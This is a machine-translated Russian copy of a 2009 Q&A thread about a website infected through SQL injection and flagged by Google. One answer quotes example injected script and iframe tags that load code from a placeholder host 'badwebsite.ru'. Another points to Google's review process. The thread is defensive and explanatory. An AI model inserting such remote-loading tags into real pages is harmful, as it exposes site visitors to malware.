Мой веб-сайт заражен, я восстановил резервную копию незараженных файлов. Сколько времени займет снятие отметки как опасной?

Question

Мой веб-сайт заражен, я восстановил резервную копию незараженных файлов. Сколько времени займет снятие отметки как опасной?

Мой сайт www.sagamountain.com недавно был заражен распространителем вредоносного ПО (или, по крайней мере, я так думаю).

Я удалил весь внешний контент, объявления Google, чат Firefly и т. Д.

Я загрузил резервную копию несколько недель назад, когда не было никаких проблем.

Я исправил дыру в SQL-инъекции.

Теперь, сколько времени потребуется, чтобы пометить его как опасный? Где я могу связаться с Google?

Я не уверен, что это правильное место для публикации, но так как это может быть проблема с сервером, я тоже могу. Могут ли сайты внедрить код base64 с помощью вируса на весь сервер или только с помощью SQL-инъекции?

Спасибо за помощь, вирусы выводят меня из себя.

Есть ли онлайн-сканер вирусов, который может сканировать мою страницу и сказать мне, что не так?

3

security web-server hacking malware

Источник

Cyclone 26 окт '09 в 19:29

2 ответа

Решение

Это относительно распространенная проблема в наши дни. Многие черви пытаются проникнуть в код вашего сервера с помощью SQL-инъекции или путем изменения локального содержимого.html, которое затем загружается на веб-сервер. Обычно они пытаются поставить:

<script src='http://badwebsite.ru/blah.js'></script>

или же

<iframe src='http://badwebsite.ru/blah.html' />

на исходную страницу с помощью SQL-инъекции или модификации исходного кода.

Насколько я знаю, черви изменяют свои векторы атаки с помощью механизмов обфускации JavaScript или аналогичных программ, и их трудно сканировать.

Эти атаки стали возможными благодаря двум недавним огромным удаленным выполнениям кода:

Adobe Flash JavaScript-эксплойты, позволяющие создавать Flash-объекты с произвольным кодом около 15 КБ.
Эксплойт к расширению Windows Presentation Framework в Firefox, установленный Microsoft .NET 3.5 в системах Windows.

И то, и другое представляет огромные угрозы безопасности.

По возможности следует использовать привязку параметров при разработке веб-приложений, чтобы избежать атак с использованием SQL-инъекций.

3

Источник

Kyle Smith 26 окт '09 в 19:36

Другие вопросы по тегам security web-server hacking malware

ManiacZX 26 окт '09 в 20:15 2009-10-26 20:15 · Accepted Answer · 2009-10-26 20:15

Что касается Google, просмотрите их страницу о сайтах, зараженных вредоносными программами.

Мой сайт и Google ›Мой сайт был взломан

Вы захотите войти на их страницу инструментов для веб-мастеров, добавить свой сайт в свою учетную запись и выполнить шаги проверки. После этого вы получите доступ к таким действиям, как запрос на проверку вашего сайта и отсутствие заражения.